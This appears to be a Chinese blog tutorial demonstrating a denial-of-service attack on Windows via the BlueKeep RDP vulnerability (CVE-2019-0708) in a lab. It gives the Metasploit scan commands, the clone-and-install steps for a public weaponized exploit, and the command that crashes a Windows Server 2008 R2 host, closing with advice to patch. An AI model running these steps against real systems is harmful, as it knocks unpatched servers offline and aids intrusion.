前言:

该漏洞前段时间已经热闹了好一阵子了,HW期间更是使用此漏洞来进行钓鱼等一系列活动,可为大家也是对此漏洞的关心程度,接下里就简单的演示下利用此漏洞进行DOS攻击。当然还有RCE的操作,这只演示下蓝屏DOS操作。

漏洞影响的操作系统:

  • Windows 2003
  • Windows XP
  • Windows Vista
  • Windows 7
  • Windows Server 2008
  • Windows Server 2008 R2

实验环境:

parrot linux:10.10.202.8/24

Windows server 2008 R2: 10.10.202.9/24

首先进行扫描,此漏洞的前提开启3389远程桌面。

这里使用msf进行扫描,注意msf升级到最新的msf5

msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 10.10.202.9
rhosts => 10.10.202.9
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit

接下来我们使用exp来进行攻击

# git clone https://github.com/Ekultek/BlueKeep

# cd BlueKeep

# pip install -r requirements.txt

# ./setup.sh

执行完以上就顺利安装完成。我们进行攻击下

执行payload:

└──╼ $sudo python bluekeep_weaponized_dos.py  -i 10.10.202.9

瞬间就挂了,可以看到漏洞还是很严重的,请各位还是尽快的打补丁吧!

最新文章

  1. PHP中GBK和UTF8乱码解决方案
  2. 将函数传给webworker
  3. CodeForces Round 195 Div2
  4. _jobdu_1384:二维数组中的查找
  5. sql语句中的 inner join 、 left join 、 right join、 full join 的区别
  6. Nginx简单性能调优
  7. Spark系列(三)SparkContext分析
  8. linux指令tips
  9. Example_07_05录音提示open failed: EACCES (Permission denied)
  10. DELL配置信息
  11. qq视频api代码
  12. 闲来无事写写-Huffman树的生成过程
  13. WindowsServer2012 R2 64位中文标准版(IIS8.5)下手动搭建PHP环境详细图文教程(二)安装IIS8.5
  14. Android 下得到 未安装APK包含信息 等
  15. [清华集训]小 Y 和恐怖的奴隶主
  16. 「LibreOJ NOI Round #1」验题
  17. EF执行SQL返回动态类型
  18. Azure PowerShell (15) 批量导出Azure ASM/ARM VM信息
  19. 【python学习-1】python环境设置与开发
  20. Map<K, V> 中k,v如果为null就转换

热门文章

  1. luogu P1976 鸡蛋饼
  2. 有了 serverless,前端也可以快速开发一个 Puppeteer 网页截图服务
  3. UIContainerView纯代码实现及原理介绍
  4. DRF Django REST framework 之 认证组件(五)
  5. [TimLinux] Linux LVM逻辑卷操作指南
  6. HDU3896 Greatest TC(双联通分量+倍增)
  7. CodeForces-617E XOR And Favorite Numbers(莫队)
  8. 【转】Nginx + CGI/FastCGI + C/Cpp
  9. nessus安装、msfconsole辅助模块使用(网安全实训第三天)
  10. ubuntu16.04没有办法使用CRT,或者SSH工具的解决办法